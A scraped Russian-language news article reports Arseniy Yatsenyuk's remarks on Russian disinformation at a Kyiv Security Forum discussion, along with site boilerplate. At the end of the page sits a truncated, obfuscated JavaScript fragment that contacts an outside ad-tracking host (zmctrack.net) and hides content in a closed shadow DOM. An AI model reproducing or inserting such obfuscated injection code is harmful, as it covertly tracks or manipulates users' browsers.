По словам экс-премьера, дезинформация является одним из важнейших вызовов современности

Дезинформация является одним из крупнейших вызовов современности, ею активно пользуется президент России Владимир Путин, и на нее нужно реагировать немедленно.

Такое мнение выразил премьер-министр Украины 2014-2016 годов, основатель Фонда “Открой Украину” и Киевского форума по безопасности (КБФ) Арсений Яценюк во время онлайн-дискуссии на КБФ15 мая.

"По моему мнению, уже нет настоящей полноценной свободы слова. Что мы наблюдаем сейчас в некоторых странах мира – то, что можно назвать “свободой лжи”. И это крупнейший вызов", – подчеркнул он.

В современном мире, подчеркнул Арсений Яценюк, "все белое можно легко подать как черное, все круглое обрисовать как квадратное": "Потому я считаю дезинформацию одним из крупнейших вызовов, на который нужно реагировать немедленно".

Сейчас с дезинформацией борются глобальные СМИ, такие как Washington Post, New York Times, – глобальные медиа, которые борются за свободу.

“То же самое происходит и в Украине, но у нас есть нехватка пространства свободы слова. Речь идет о том, кто владеет средствами массовой информации в Украине, украинскими телевизионными каналами. Например, Путин контролирует 50% всех новостных каналов в Украине. А это значит, что он на 50% может легко контролировать умы и сердца украинцев", – сказал основатель КБФ.

Читайте также:  Команда Зеленского в первые 100 дней намерена провести "аудит государства" – Стефанчук

В тренде
Дело на миллион: НАБУ вычислило еще одного экс-нардепа, незаконно получившего компенсацию за жилье

Арсений Яценюк подчеркнул, что цель Путина – не транслировать собственный нарратив, а подрывать правду.

"Цель Путина – принести хаос в Украину и в западный мир. Цель Путина – подорвать доверие. Доверие к лидерству, доверие к лидерам и к ценностям. И мы должны с этим бороться – нашей собственной правдивой информацией, реальной свободой слова, эффективной журналистикой и независимыми новостными СМИ", – добавил он.

Тема нынешней дискуссия КБФ, организованной Фондом Арсения Яценюка “Открой Украину” – “Кто воюет против мировой демократии?”.

Участниками разговора стали американская журналистка, лауреат Пулитцеровской премии Энн Епплбаум; немецкий политический и общественный деятель, член Европейского парламента в 2004-19 годах Ребекка Хармс; американский дипломат, бывший заместитель Госсекретаря США по вопросам Европы и Евразии, координатор санкционной политики США во время администрации президента Обамы Дениэл Фрид; британский журналист и автор, приглашенный старший научный сотрудник Института глобальных дел Лондонской школы экономики Питер Померанцев; философ, директор аналитических проектов “Интерньюз-Украина”, главный реактор инициативы “UkraineWorld” Владимир Еромоленко. Модератор – Даниил Лубкивский, бывший заметитель Министра иностранных дел Украины, член Наблюдательного совета фонда “Открой Украину”.

Читайте также:  Экс-депутат Госдумы рассказал, сколько стоит россиянам война против Украины

	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцев

	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцев

	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцев

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

новости
СМИ
Арсений Яценюк
Владимир Путин
дезинформация

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцевОбновленная “Свобода слова Савика Шустера”: где смотретьУкраина 	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцевЕС не позвал Украину на саммит Восточного партнерства: названа причинаПолитика 	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцевЗеленский снял санкции с внучки Муссолини и пяти организаторов псевдовыборов в “Л/ДНР”Политика 	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцевБывший “слуга народа” подал в суд на Разумкова из-за банковского законаПолитика 	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцевЗеленский снял с компаний и офшоров санкции, наложенные при ПорошенкоПолитика 	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцевЧлены ЦИК выписали себе “космические” премии: подробности скандалаПолитика

Новости партнеров

Загрузка…

загрузка…

	Арсений Яценюк: Путин контролирует 50% новостных каналов Украины и может контролировать умы украинцев

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

  •  
  •  
  •  
  •  
  •  
  •